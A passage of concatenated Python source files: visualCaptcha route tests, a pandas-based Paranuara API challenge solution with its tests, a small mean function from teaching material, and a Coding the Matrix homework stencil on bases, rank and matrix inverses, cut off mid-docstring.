self.assertIsNotNone( data['values'] )
self.assertTrue( len(data['imageName']) > 0 )
self.assertTrue( len(data['imageFieldName']) > 0 )
self.assertTrue( len(data['audioFieldName']) > 0 )
self.assertIsInstance( data['values'], list )
self.assertTrue( len(data['values']) > 0 )
self.assertIsNotNone( data['values'][0] )
# Test Audio routes
class AudioTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# Should return an mp3 audio file
def test_audio_mp3( self ):
response = client.get( '/audio' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'audio/mpeg', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return an ogg audio file
def test_audio_ogg( self ):
response = client.get( '/audio/ogg' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'audio/ogg', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Test Image routes
class ImageTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# Should return 404 error when calling /image without the index number
def test_image_no_index( self ):
response = client.get( '/image' )
self.assertEqual( response.status_code, 404 )
# Should return an image file
def test_image_zero( self ):
response = client.get( '/image/0' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return another image file
def test_image_one( self ):
response = client.get( '/image/1' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return a retina image file
def test_image_retina( self ):
response = client.get( '/image/1?retina=1' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return 404 error when calling /image with a non-existing index_number
def test_image_invalid_index( self ):
response = client.get( '/image/100' )
self.assertEqual( response.status_code, 404 )
# Test Try routes
class TryTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
global frontendData
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# We need to store this to use it later
frontendData = json.loads( response.content )
# Should redirect to /?status=failedPost when no data is posted
def test_no_data( self ):
response = client.post( '/try', {} )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedPost' )
# Should redirect to /?status=failedImage when the captcha image answer is wrong
def test_invalid_image( self ):
response = client.post( '/try', { frontendData['imageFieldName']: 'definitely-wrong-image-answer' } )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedImage' )
# Should redirect to /?status=failedAudio when the captcha audio answer is wrong
def test_invalid_audio( self ):
response = client.post( '/try', { frontendData['audioFieldName']: 'definitely-wrong-audio-answer' } )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedAudio' )
if __name__ == '__main__':
print "Running unit tests"
unittest.main()
```
{
"source": "jedi-Knight/paranuara-api-challenge-solution",
"score": 3
}
#### File: jedi-Knight/paranuara-api-challenge-solution/model.py
```python
from pandas import read_json, merge
class Model(object):
df = None
def __init__(self, left_table_json, right_table_json, left_key, right_key):
assert isinstance(left_table_json, str), 'Type mismatch! left_table_json must be of type str'
assert isinstance(right_table_json, str), 'Type mismatch! right_table_json must be of type str'
try:
companies_df = read_json(left_table_json)
users_df = read_json(right_table_json)
except FileNotFoundError:
raise AssertionError('People and companies data not found at the given URI!')
except:
raise AssertionError('There was a problem reading the data!')
self.df = merge(left=companies_df, right=users_df, left_on=left_key, right_on=right_key, how='outer')
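# Usage sketch (file names and keys are illustrative):
#   model = Model('companies.json', 'people.json', 'index', 'company_id')
#   print(model.df.head())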
```
#### File: jedi-Knight/paranuara-api-challenge-solution/test_http.py
```python
import pytest, requests
from json import loads
from config import INDEX_PAGE_CONTENT, ERROR_404_MESSAGE
BASE_URL = 'http://127.0.0.1:8080/'
@pytest.mark.parametrize('index_page, expected_response_code, expected_content_type, expected_content', [
('', 200, 'text/html; charset=UTF-8', INDEX_PAGE_CONTENT),
])
def test_endpoint_index_page(index_page, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + index_page)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('invalid_endpoint, expected_response_code, expected_content_type, expected_content', [
('Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE),
('/Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE),
('/Invalid/Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE)
])
def test_endpoint_invalid(invalid_endpoint, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + invalid_endpoint)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('company_name, expected_response_code, expected_content_type, expected_content', [
('PERMADYNE', 200, 'application/json', '{"number-of-employees": 7, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}'),
('Non Existant', 200, 'application/json', '{"number-of-employees": 0, "employees": [], "message": "The company has no employees."}')
])
def test_endpoint_company(company_name, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'company/' + company_name)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('person_one, person_two, expected_response_code, expected_content_type, expected_content', [
('<NAME>','<NAME>', 200, 'application/json','{"user-1": {"name": "<NAME>", "age": 35.0, "address": "797 Vandervoort Place, Wheaton, Kentucky, 1051", "phone": "+1 (992) 532-3748"}, "user-2": {"name": "<NAME>", "age": 40.0, "address": "718 Locust Street, Ernstville, Kentucky, 741", "phone": "+1 (947) 466-2999"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>", "<NAME>ie"]}'),
('Moon Herring', 'None Existant', 200, 'application/json', '{"message": "One or more users not found."}')
])
def test_endpoint_two_people(person_one, person_two, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'user/' + person_one + '/' + person_two)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('person_name, expected_response_code, expected_content_type, expected_content', [
('Moon Herring', 200, 'application/json', {"username": "Moon Herring", "age": 40, "fruits": ["orange"], "vegetables": ["carrot", "beetroot", "celery"]}),
('Non Existant', 200, 'application/json', {"message": "User not found."})
])
def test_endpoint_one_person(person_name, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'user/' + person_name)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
try:
gotten_content = loads(gotten_content)
except:
raise AssertionError('This endpoint must return a valid JSON string!')
if 'fruits' in gotten_content.keys():
gotten_content['fruits'] = set(gotten_content['fruits'])
expected_content['fruits'] = set(expected_content['fruits'])
if 'vegetables' in gotten_content.keys():
gotten_content['vegetables'] = set(gotten_content['vegetables'])
expected_content['vegetables'] = set(expected_content['vegetables'])
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
```
#### File: jedi-Knight/paranuara-api-challenge-solution/test_view.py
```python
import pytest
@pytest.fixture(scope='module')
def view():
from model import Model
from config import DATA_FILES, DATA_MERGE_KEYS
from view import View
try:
view = View( Model( DATA_FILES['companies'], DATA_FILES['users'], DATA_MERGE_KEYS['companies'], DATA_MERGE_KEYS['users'] ) )
return view
except:
raise AssertionError('There was a problem creating the Model instance!')
@pytest.mark.parametrize('records, testfield, expected_result',[
([],'name',[]),
([{'name':'Any Name'}], 'name', [{'name':'Any Name'}]),
([{'name':'Any Name'},{'name':float('nan')},{'name':'Another Name'}], 'name', [{'name':'Any Name'}, {'name':'Another Name'}])
])
def test_remove_artefacts(view, records, testfield, expected_result):
assert view.remove_artefacts(records, testfield) == expected_result
@pytest.mark.parametrize('user_data, expected_result',[
([{'name': float('nan')}], {'employees': [],'message': 'The company has no employees.','number-of-employees': 0}),
([{'name': "Any Name"}, {'name': float('nan')}], {'number-of-employees': 1, 'employees': ["Any Name"]}),
([{'name': float('nan')}, {'name': float('nan')}], {'employees': [],'message': 'The company has no employees.','number-of-employees': 0}),
([{'name': "Any Name"}, {'name': "Another Name"}], {'number-of-employees': 2, 'employees': ["Any Name", "Another Name"]}),
([{'name': "Any Name"}, {'name': "Another Name"}, {'name': "Another Name"}, {'name': float('nan')}], {'number-of-employees': 3, 'employees': ["Any Name", "Another Name", "Another Name"]}),
])
def test_format_users_list(view, user_data, expected_result):
assert view.format_users_list(user_data) == expected_result
@pytest.mark.parametrize('two_user_data, common_friends, expected_output',[
([{'name': '<NAME>', 'age': 43.0, 'address': '381 Debevoise Avenue, Whitmer, Minnesota, 2849', 'phone': '+1 (879) 555-3032'}, {'name': '<NAME>', 'age': 60, 'address': '492 Stockton Street, Lawrence, Guam, 4854', 'phone': '+1 (893) 587-3311'}],
[{'name': '<NAME>'}, {'name': '<NAME>'}, {'name': '<NAME>'}, {'name': '<NAME>'},{"name":"<NAME>"}],
{"user-1": {"name": "<NAME>", "age": 43.0, "address": "381 Debevoise Avenue, Whitmer, Minnesota, 2849", "phone": "+1 (879) 555-3032"}, "user-2": {"name": "<NAME>", "age": 60.0, "address": "492 Stockton Street, Lawrence, Guam, 4854", "phone": "+1 (893) 587-3311"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>"]}),
([],[],{"message": "One or more users not found."})
])
def test_format_two_users_data(view, two_user_data, common_friends, expected_output):
assert view.format_two_users_data(two_user_data, common_friends) == expected_output
@pytest.mark.parametrize('user_data, expected_result', [
([{'name': '<NAME>', 'age': 32, 'favouriteFood': ['orange', 'apple', 'carrot', 'strawberry']}], {"username": "Goodwin Cook", "age": 32.0, "fruits": ["apple", "strawberry", "orange"], "vegetables": ["carrot"]}),
([{'name': '<NAME>', 'age': 40, 'favouriteFood': ['orange', 'beetroot', 'carrot', 'celery']}], {"username": "Moon Herring", "age": 40.0, "fruits": ["orange"], "vegetables": ["celery", "beetroot", "carrot"]}),
([],{"message": "User not found."})
])
def test_format_user_data(view, user_data, expected_result):
gotten_result = view.format_user_data(user_data)
if 'fruits' in gotten_result.keys():
gotten_result['fruits'] = set(gotten_result['fruits'])
expected_result['fruits'] = set(expected_result['fruits'])
gotten_result['vegetables'] = set(gotten_result['vegetables'])
expected_result['vegetables'] = set(expected_result['vegetables'])
assert gotten_result == expected_result
@pytest.mark.parametrize('company_name, expected_result', [
("PERMADYNE", {"number-of-employees": 7, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("ZOINAGE", {"number-of-employees": 9, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("MICROLUXE", {"number-of-employees": 10, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("NETBOOK",{"number-of-employees": 0, "employees": [], "message": "The company has no employees."})
])
def test_company_users(view, company_name, expected_result):
assert view.company_users(company_name) == expected_result
@pytest.mark.parametrize('user_name_1, user_name_2, expected_result', [
("<NAME>", "<NAME>", {"user-1": {"name": "<NAME>", "age": 56.0, "address": "430 Frank Court, Camino, American Samoa, 2134", "phone": "+1 (889) 544-3275"}, "user-2": {"name": "<NAME>", "age": 35.0, "address": "797 Vandervoort Place, Wheaton, Kentucky, 1051", "phone": "+1 (992) 532-3748"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("<NAME>", "WalterAvery", {"message": "One or more users not found."}),
("Lqws", "WalterAvery", {"message": "One or more users not found."}),
("Lqws", "<NAME>", {"message": "One or more users not found."}),
("<NAME>", "<NAME>", {"message": "One or more users not found."})
])
def test_two_users(view, user_name_1, user_name_2, expected_result):
assert view.two_users(user_name_1, user_name_2) == expected_result
@pytest.mark.parametrize('user_name, expected_result', [
("<NAME>", {"username": "Luna Rodgers", "age": 56, "fruits": ["banana"], "vegetables": ["beetroot", "celery", "cucumber"]}),
("<NAME>", {"username": "Moon Herring", "age": 40.0, "fruits": ["orange"], "vegetables": ["beetroot", "carrot", "celery"]}),
("Goodwin Cook", {"username": "Goodwin Cook", "age": 32, "fruits": ["apple", "strawberry", "orange"], "vegetables": ["carrot"]}),
("qeqweqwewqe",{"message": "User not found."})
])
def test_user(view, user_name, expected_result):
gotten_result = view.user(user_name)
if 'fruits' in gotten_result.keys():
gotten_result['fruits'] = set(gotten_result['fruits'])
expected_result['fruits'] = set(expected_result['fruits'])
gotten_result['vegetables'] = set(gotten_result['vegetables'])
expected_result['vegetables'] = set(expected_result['vegetables'])
assert gotten_result == expected_result
```
#### File: jedi-Knight/paranuara-api-challenge-solution/view.py
```python
from model import Model
from query import Query
from config import FOOD_TYPES
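# FOOD_TYPES (from config) is assumed to map food categories to sets of names, e.g.:
#   {'fruits': {'apple', 'orange', ...}, 'vegetables': {'carrot', 'celery', ...}}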
class View(object):
query = None
def __init__(self, model):
assert isinstance(model, Model), 'Type mismatch! model must be of type Model.'
self.query = Query(model)
def remove_artefacts(self, records, testfield):
assert isinstance(records, list), 'Type mismatch! records must be of type list.'
assert isinstance(testfield, str), 'Type mismatch! testfield must be of type str.'
artefacts_removed = []
for item in records:
# pandas represents missing string values as float NaN, so a float here means "no value".
if not isinstance(item[testfield], float):
artefacts_removed.append(item)
return artefacts_removed
def format_users_list(self, users_data):
assert isinstance(users_data, list), 'Type mismatch! users_data must be of type list.'
users_data = self.remove_artefacts(users_data, 'name')
formatted_data = {
'number-of-employees': len(users_data),
'employees': [ item['name'] for item in users_data ]
}
if len(users_data) == 0:
formatted_data['message'] = 'The company has no employees.'
return formatted_data
def format_two_users_data(self, two_user_data, common_friends):
assert isinstance(two_user_data, list), 'Type mismatch! two_user_data must be of type list.'
assert isinstance(common_friends, list), 'Type mismatch! friends_in_common must be of type list.'
if len(two_user_data) == 2:
common_friends_semantic_filtered = []
for friend in common_friends:
if friend['name'] != two_user_data[0]['name'] and friend['name'] != two_user_data[1]['name']:
common_friends_semantic_filtered.append(friend['name'])
formatted_data = {
'user-1': two_user_data[0],
'user-2': two_user_data[1],
'friends-in-common': common_friends_semantic_filtered
}
else:
formatted_data = {
'message': 'One or more users not found.'
}
return formatted_data
def format_user_data(self, user_data):
assert isinstance(user_data, list), 'Type mismatch! users_data must be of type list.'
if len(user_data) > 0:
user_data = user_data[0]
user_favourite_food = set(user_data['favouriteFood'])
formatted_data = {
'username': user_data['name'],
'age': int(user_data['age']),
'fruits': list( user_favourite_food & FOOD_TYPES['fruits'] ),
'vegetables': list( user_favourite_food & FOOD_TYPES['vegetables'] )
}
else:
formatted_data = {
"message": "User not found."
}
return formatted_data
def company_users(self, company_name):
assert isinstance(company_name, str), 'Type mismatch! company_name must be of type str.'
users_data = self.query.single_column_value_match('company', company_name, ['name'])
return self.format_users_list(users_data)
def two_users(self, user_name_1, user_name_2):
assert isinstance(user_name_1, str), 'Type mismatch! user_name_1 must be of type str.'
assert isinstance(user_name_2, str), 'Type mismatch! user_name_2 must be of type str.'
two_users_data = self.query.single_column_list_of_values_match('name', [user_name_1, user_name_2], ['name', 'age', 'address', 'phone', 'friends'])
common_friends_ids = set()
for user in two_users_data:
common_friends_ids = common_friends_ids | set([ user_friend['index'] for user_friend in user['friends'] ])
del(user['friends'])
common_friends_ids = list(common_friends_ids)
common_friends = self.query.multi_column_match(['name'], ('index_y', common_friends_ids), ('eyeColor', 'brown'), ('has_died', False))
return self.format_two_users_data(two_users_data, common_friends)
def user(self, user_name):
assert isinstance(user_name, str), 'Type mismatch! user_name must be of type str.'
user_data = self.query.single_column_value_match('name',user_name,['name', 'age', 'favouriteFood'])
return self.format_user_data(user_data)
```
{
"source": "jedi-Knight/teaching-material-python-lesson-3",
"score": 3
}
#### File: jedi-Knight/teaching-material-python-lesson-3/data_series_mean.py
```python
def calculate(xData):
xData = [float(x) for x in xData]
return sum(xData)/len(xData)
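# Example: calculate(['1', '2', '3']) returns 2.0; an empty list raises ZeroDivisionError.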
```
{
"source": "JediKoder/coursera-CodeMatrix",
"score": 4
}
#### File: coursera-CodeMatrix/homeworks/05_Dimension_problems.py
```python
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
from vecutil import list2vec
from GF2 import one
from solver import solve
from matutil import listlist2mat, coldict2mat
from mat import Mat
from vec import Vec
## 1: (Problem 1) Iterative Exchange Lemma
w0 = list2vec([1,0,0])
w1 = list2vec([0,1,0])
w2 = list2vec([0,0,1])
v0 = list2vec([1,2,3])
v1 = list2vec([1,3,3])
v2 = list2vec([0,3,3])
# Fill in exchange_S1 and exchange_S2
# with appropriate lists of 3 vectors
exchange_S0 = [w0, w1, w2]
exchange_S1 = [...]
exchange_S2 = [...]
exchange_S3 = [v0, v1, v2]
## 2: (Problem 2) Another Iterative Exchange Lemma
w0 = list2vec([0,one,0])
w1 = list2vec([0,0,one])
w2 = list2vec([one,one,one])
v0 = list2vec([one,0,one])
v1 = list2vec([one,0,0])
v2 = list2vec([one,one,0])
exchange_2_S0 = [w0, w1, w2]
exchange_2_S1 = [...]
exchange_2_S2 = [...]
exchange_2_S3 = [v0, v1, v2]
## 3: (Problem 3) Morph Lemma Coding
def morph(S, B):
'''
Input:
- S: a list of distinct Vecs
- B: a list of linearly independent Vecs all in Span S
Output: a list of pairs of vectors to inject and eject (see problem description)
Example:
>>> # This is how our morph works. Yours may yield different results.
>>> # Note: Make a copy of S to modify instead of modifying S itself.
>>> from vecutil import list2vec
>>> from vec import Vec
>>> S = [list2vec(v) for v in [[1,0,0],[0,1,0],[0,0,1]]]
>>> B = [list2vec(v) for v in [[1,1,0],[0,1,1],[1,0,1]]]
>>> D = {0, 1, 2}
>>> morph(S, B) == [(Vec(D,{0: 1, 1: 1, 2: 0}), Vec(D,{0: 1, 1: 0, 2: 0})), (Vec(D,{0: 0, 1: 1, 2: 1}), Vec(D,{0: 0, 1: 1, 2: 0})), (Vec(D,{0: 1, 1: 0, 2: 1}), Vec(D,{0: 0, 1: 0, 2: 1}))]
True
>>> S == [list2vec(v) for v in [[1,0,0],[0,1,0],[0,0,1]]]
True
>>> B == [list2vec(v) for v in [[1,1,0],[0,1,1],[1,0,1]]]
True
>>> from GF2 import one
>>> D = {0, 1, 2, 3, 4, 5, 6, 7}
>>> S = [Vec(D,{1: one, 2: one, 3: one, 4: one}), Vec(D,{1: one, 3: one}), Vec(D,{0: one, 1: one, 3: one, 5: one, 6: one}), Vec(D,{3: one, 4: one}), Vec(D,{3: one, 5: one, 6: one})]
>>> B = [Vec(D,{2: one, 4: one}), Vec(D,{0: one, 1: one, 2: one, 3: one, 4: one, 5: one, 6: one}), Vec(D,{0: one, 1: one, 2: one, 5: one, 6: one})]
>>> sol = morph(S, B)
>>> sol == [(B[0],S[0]), (B[1],S[2]), (B[2],S[3])] or sol == [(B[0],S[1]), (B[1],S[2]), (B[2],S[3])]
True
>>> # Should work the same regardless of order of S
>>> from random import random
>>> sol = morph(sorted(S, key=lambda x:random()), B)
>>> sol == [(B[0],S[0]), (B[1],S[2]), (B[2],S[3])] or sol == [(B[0],S[1]), (B[1],S[2]), (B[2],S[3])]
True
'''
pass
## 4: (Problem 4) Row and Column Rank Practice
# Please express each solution as a list of Vecs
row_space_1 = [...]
col_space_1 = [...]
row_space_2 = [...]
col_space_2 = [...]
row_space_3 = [...]
col_space_3 = [...]
row_space_4 = [...]
col_space_4 = [...]
## 5: (Problem 5) Subset Basis
def subset_basis(T):
'''
Input:
- T: a set of Vecs
Output:
- set S containing Vecs from T that is a basis for Span T.
Examples:
The following tests use the procedure is_independent, provided in module independence
>>> from vec import Vec
>>> from independence import is_independent
>>> a0 = Vec({'a','b','c','d'}, {'a':1})
>>> a1 = Vec({'a','b','c','d'}, {'b':1})
>>> a2 = Vec({'a','b','c','d'}, {'c':1})
>>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})
>>> sb = subset_basis({a0, a1, a2, a3})
>>> len(sb)
3
>>> all(v in [a0, a1, a2, a3] for v in sb)
True
>>> is_independent(sb)
True
>>> b0 = Vec({0,1,2,3},{0:2,1:2,3:4})
>>> b1 = Vec({0,1,2,3},{0:1,1:1})
>>> b2 = Vec({0,1,2,3},{2:3,3:4})
>>> b3 = Vec({0,1,2,3},{3:3})
>>> sb = subset_basis({b0, b1, b2, b3})
>>> len(sb)
3
>>> all(v in [b0, b1, b2, b3] for v in sb)
True
>>> is_independent(sb)
True
>>> D = {'a','b','c','d'}
>>> c0, c1, c2, c3, c4 = Vec(D,{'d': one, 'c': one}), Vec(D,{'d': one, 'a': one, 'c': one, 'b': one}), Vec(D,{'a': one}), Vec(D,{}), Vec(D,{'d': one, 'a': one, 'b': one})
>>> subset_basis({c0,c1,c2,c3,c4}) == {c0,c1,c2,c4}
True
'''
pass
## 6: (Problem 6) Superset Basis Lemma in Python
def superset_basis(C, T):
'''
Input:
- C: linearly independent set of Vecs
- T: set of Vecs such that every Vec in C is in Span(T)
Output:
Linearly independent set S consisting of all Vecs in C and some in T
such that the span of S is the span of T (i.e. S is a basis for the span
of T).
Example:
>>> from vec import Vec
>>> from independence import is_independent
>>> a0 = Vec({'a','b','c','d'}, {'a':1})
>>> a1 = Vec({'a','b','c','d'}, {'b':1})
>>> a2 = Vec({'a','b','c','d'}, {'c':1})
>>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})
>>> sb = superset_basis({a0, a3}, {a0, a1, a2})
>>> a0 in sb and a3 in sb
True
>>> is_independent(sb)
True
>>> all(x in [a0,a1,a2,a3] for x in sb)
True
'''
pass
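# The same greedy idea works here (a sketch, assuming independence.is_independent):
# start from C, then add vectors of T that keep the set independent.
def superset_basis_sketch(C, T):
    from independence import is_independent
    S = set(C)
    for v in T:
        if is_independent(list(S | {v})):
            S.add(v)
    return S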
## 7: (Problem 7) My Is Independent Procedure
def my_is_independent(L):
'''
Input:
- L: a list of Vecs
Output:
- boolean: true if the list is linearly independent
Examples:
>>> D = {0, 1, 2}
>>> L = [Vec(D,{0: 1}), Vec(D,{1: 1}), Vec(D,{2: 1}), Vec(D,{0: 1, 1: 1, 2: 1}), Vec(D,{0: 1, 1: 1}), Vec(D,{1: 1, 2: 1})]
>>> my_is_independent(L)
False
>>> my_is_independent(L[:2])
True
>>> my_is_independent(L[:3])
True
>>> my_is_independent(L[1:4])
True
>>> my_is_independent(L[0:4])
False
>>> my_is_independent(L[2:])
False
>>> my_is_independent(L[2:5])
False
>>> L == [Vec(D,{0: 1}), Vec(D,{1: 1}), Vec(D,{2: 1}), Vec(D,{0: 1, 1: 1, 2: 1}), Vec(D,{0: 1, 1: 1}), Vec(D,{1: 1, 2: 1})]
True
'''
pass
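# One way to sketch this: a list is independent exactly when a maximal
# independent sublist has the same length as the list itself.
def my_is_independent_sketch(L):
    from independence import is_independent  # used only for this illustration
    basis = []
    for v in L:
        if is_independent(basis + [v]):
            basis.append(v)
    return len(basis) == len(L)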
## 8: (Problem 8) My Rank
def my_rank(L):
'''
Input:
- L: a list of Vecs
Output:
- the rank of the list of Vecs
Example:
>>> L = [list2vec(v) for v in [[1,2,3],[4,5,6],[1.1,1.1,1.1]]]
>>> my_rank(L)
2
>>> L == [list2vec(v) for v in [[1,2,3],[4,5,6],[1.1,1.1,1.1]]]
True
>>> my_rank([list2vec(v) for v in [[1,1,1],[2,2,2],[3,3,3],[4,4,4],[123,432,123]]])
2
'''
pass
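# Following the sketch above, the rank is just the size of a maximal
# independent sublist, so the same greedy pass can return its length.
def my_rank_sketch(L):
    from independence import is_independent
    basis = []
    for v in L:
        if is_independent(basis + [v]):
            basis.append(v)
    return len(basis)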
## 9: (Problem 9) Direct Sum Unique Representation
def direct_sum_decompose(U_basis, V_basis, w):
'''
Input:
- U_basis: a list of Vecs forming a basis for a vector space U
- V_basis: a list of Vecs forming a basis for a vector space V
- w: a Vec in the direct sum of U and V
Output:
- a pair (u, v) such that u + v = w, u is in U, v is in V
Example:
>>> D = {0,1,2,3,4,5}
>>> U_basis = [Vec(D,{0: 2, 1: 1, 2: 0, 3: 0, 4: 6, 5: 0}), Vec(D,{0: 11, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0}), Vec(D,{0: 3, 1: 1.5, 2: 0, 3: 0, 4: 7.5, 5: 0})]
>>> V_basis = [Vec(D,{0: 0, 1: 0, 2: 7, 3: 0, 4: 0, 5: 1}), Vec(D,{0: 0, 1: 0, 2: 15, 3: 0, 4: 0, 5: 2})]
>>> w = Vec(D,{0: 2, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0})
>>> (u, v) = direct_sum_decompose(U_basis, V_basis, w)
>>> (u + v - w).is_almost_zero()
True
>>> U_matrix = coldict2mat(U_basis)
>>> V_matrix = coldict2mat(V_basis)
>>> (u - U_matrix*solve(U_matrix, u)).is_almost_zero()
True
>>> (v - V_matrix*solve(V_matrix, v)).is_almost_zero()
True
>>> ww = Vec(D,{0: 2, 1: 5, 2: 51, 4: 1, 5: 7})
>>> (u, v) = direct_sum_decompose(U_basis, V_basis, ww)
>>> (u + v - ww).is_almost_zero()
True
>>> (u - U_matrix*solve(U_matrix, u)).is_almost_zero()
True
>>> (v - V_matrix*solve(V_matrix, v)).is_almost_zero()
True
>>> U_basis == [Vec(D,{0: 2, 1: 1, 2: 0, 3: 0, 4: 6, 5: 0}), Vec(D,{0: 11, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0}), Vec(D,{0: 3, 1: 1.5, 2: 0, 3: 0, 4: 7.5, 5: 0})]
True
>>> V_basis == [Vec(D,{0: 0, 1: 0, 2: 7, 3: 0, 4: 0, 5: 1}), Vec(D,{0: 0, 1: 0, 2: 15, 3: 0, 4: 0, 5: 2})]
True
>>> w == Vec(D,{0: 2, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0})
True
'''
pass
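# A possible sketch (assuming matutil.coldict2mat and solver.solve, which the
# doctests above already use): solve [U_basis | V_basis] * x = w, then split
# the solution's coordinates between the two bases.
def direct_sum_decompose_sketch(U_basis, V_basis, w):
    from matutil import coldict2mat
    from solver import solve
    x = solve(coldict2mat(U_basis + V_basis), w)
    u = sum(x[i] * U_basis[i] for i in range(len(U_basis)))
    v = sum(x[len(U_basis) + j] * V_basis[j] for j in range(len(V_basis)))
    return (u, v)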
## 10: (Problem 10) Is Invertible Function
def is_invertible(M):
'''
    input: A matrix, M
    output: A boolean indicating if M is invertible.
>>> M = Mat(({0, 1, 2, 3}, {0, 1, 2, 3}), {(0, 1): 0, (1, 2): 1, (3, 2): 0, (0, 0): 1, (3, 3): 4, (3, 0): 0, (3, 1): 0, (1, 1): 2, (2, 1): 0, (0, 2): 1, (2, 0): 0, (1, 3): 0, (2, 3): 1, (2, 2): 3, (1, 0): 0, (0, 3): 0})
>>> is_invertible(M)
True
>>> M1 = Mat(({0,1,2},{0,1,2}),{(0,0):1,(0,2):2,(1,2):3,(2,2):4})
>>> is_invertible(M1)
False
'''
pass
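# A possible sketch: a matrix is invertible iff it is square and its columns
# are linearly independent (assumes matutil.mat2coldict and independence.rank).
def is_invertible_sketch(M):
    from matutil import mat2coldict
    from independence import rank
    cols = list(mat2coldict(M).values())
    return len(M.D[0]) == len(M.D[1]) and rank(cols) == len(cols)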
## 11: (Problem 11) Inverse of a Matrix over GF(2)
def find_matrix_inverse(A):
'''
Input:
- A: an invertible Mat over GF(2)
Output:
- A Mat that is the inverse of A
Examples:
>>> M1 = Mat(({0,1,2}, {0,1,2}), {(0, 1): one, (1, 0): one, (2, 2): one})
>>> find_matrix_inverse(M1) == Mat(M1.D, {(0, 1): one, (1, 0): one, (2, 2): one})
True
>>> M2 = Mat(({0,1,2,3},{0,1,2,3}),{(0,1):one,(1,0):one,(2,2):one})
>>> find_matrix_inverse(M2) == Mat(M2.D, {(0, 1): one, (1, 0): one, (2, 2): one})
True
'''
pass
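# A sketch using the course solver (assumption: solver.solve handles GF(2)
# systems): solve A x = e_j for each standard basis vector e_j and assemble
# the solutions as the columns of the inverse.
def find_matrix_inverse_sketch(A):
    from solver import solve
    from matutil import coldict2mat
    from vec import Vec
    from GF2 import one
    cols = {j: solve(A, Vec(A.D[0], {j: one})) for j in A.D[1]}
    return coldict2mat(cols)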
## 12: (Problem 12) Inverse of a Triangular Matrix
def find_triangular_matrix_inverse(A):
'''
Supporting GF2 is not required.
Input:
- A: an upper triangular Mat with nonzero diagonal elements
Output:
- Mat that is the inverse of A
Example:
>>> A = listlist2mat([[1, .5, .2, 4],[0, 1, .3, .9],[0,0,1,.1],[0,0,0,1]])
